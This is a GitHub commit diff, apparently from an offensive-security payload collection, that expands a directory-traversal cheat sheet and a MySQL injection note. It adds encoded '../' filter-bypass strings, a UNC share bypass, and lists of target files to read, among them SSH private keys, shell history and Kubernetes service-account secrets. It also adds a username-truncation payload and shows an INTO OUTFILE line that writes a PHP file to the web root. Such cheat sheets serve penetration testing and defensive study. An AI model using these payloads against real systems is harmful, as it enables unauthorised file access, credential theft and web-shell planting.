You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Copy file name to clipboardExpand all lines: Directory Traversal/README.md
+29-14Lines changed: 29 additions & 14 deletions
Original file line number
Diff line number
Diff line change
@@ -6,7 +6,14 @@
6
6
7
7
*[Tools](#tools)
8
8
*[Basic exploitation](#basic-exploitation)
9
+
*[16 bits Unicode encoding](#)
10
+
*[UTF-8 Unicode encoding](#)
11
+
*[Bypass "../" replaced by ""](#)
12
+
*[Double URL encoding](#)
13
+
*[UNC Bypass](#unc-bypass)
9
14
*[Path Traversal](#path-traversal)
15
+
*[Interesting Linux files](#)
16
+
*[Interesting Windows files](#)
10
17
11
18
## Tools
12
19
@@ -31,41 +38,50 @@ We can use the `..` characters to access the parent directory, the following str
31
38
%uff0e%uff0e%u2216
32
39
```
33
40
34
-
16 bit Unicode encoding
41
+
### 16 bits Unicode encoding
35
42
36
43
```powershell
37
44
. = %u002e
38
45
/ = %u2215
39
46
\ = %u2216
40
47
```
41
48
42
-
UTF-8 Unicode encoding
49
+
### UTF-8 Unicode encoding
43
50
44
51
```powershell
45
52
. = %c0%2e, %e0%40%ae, %c0ae
46
53
/ = %c0%af, %e0%80%af, %c0%2f
47
54
\ = %c0%5c, %c0%80%5c
48
55
```
49
56
57
+
### Bypass "../" replaced by ""
50
58
Sometimes you encounter a WAF which remove the "../" characters from the strings, just duplicate them.
51
59
52
60
```powershell
53
61
..././
54
62
...\.\
55
63
```
56
64
57
-
Double URL encoding
65
+
### Double URL encoding
58
66
59
67
```powershell
60
68
. = %252e
61
69
/ = %252f
62
70
\ = %255c
63
71
```
64
72
73
+
### UNC Bypass
74
+
75
+
An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file.
76
+
77
+
```powershell
78
+
\\localhost\c$\windows\win.ini
79
+
```
80
+
65
81
66
82
## Path Traversal
67
83
68
-
Linux - Interesting files to check out :
84
+
### Interesting Linux files
69
85
70
86
```powershell
71
87
/etc/issue
@@ -85,9 +101,16 @@ Linux - Interesting files to check out :
85
101
/proc/net/route
86
102
/proc/net/tcp
87
103
/proc/net/udp
104
+
/proc/self/cwd/index.php
105
+
/proc/self/cwd/main.py
106
+
/home/$USER/.bash_history
107
+
/home/$USER/.ssh/id_rsa
108
+
/var/run/secrets/kubernetes.io/serviceaccount
88
109
```
89
110
90
-
Windows - Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
111
+
### Interesting Windows files
112
+
113
+
Interesting files to check out (Extracted from https://github.com/soffensive/windowsblindread)
91
114
92
115
```powershell
93
116
c:/boot.ini
@@ -127,15 +150,7 @@ The following log files are controllable and can be included with an evil payloa
Copy file name to clipboardExpand all lines: SQL Injection/MySQL Injection.md
+6Lines changed: 6 additions & 0 deletions
Original file line number
Diff line number
Diff line change
@@ -263,6 +263,12 @@ SELECT '' INTO OUTFILE '/var/www/html/x.php' FIELDS TERMINATED BY '<?php phpinfo
263
263
264
264
In MYSQL "`admin `" and "`admin`" are the same. If the username column in the database has a character-limit the rest of the characters are truncated. So if the database has a column-limit of 20 characters and we input a string with 21 characters the last 1 character will be removed.
265
265
266
+
```sql
267
+
`username`varchar(20) not null
268
+
```
269
+
270
+
Payload: `username = "admin a"`
271
+
266
272
## MYSQL UDF command execution
267
273
268
274
First you need to check if the UDF are installed on the server.
0 commit comments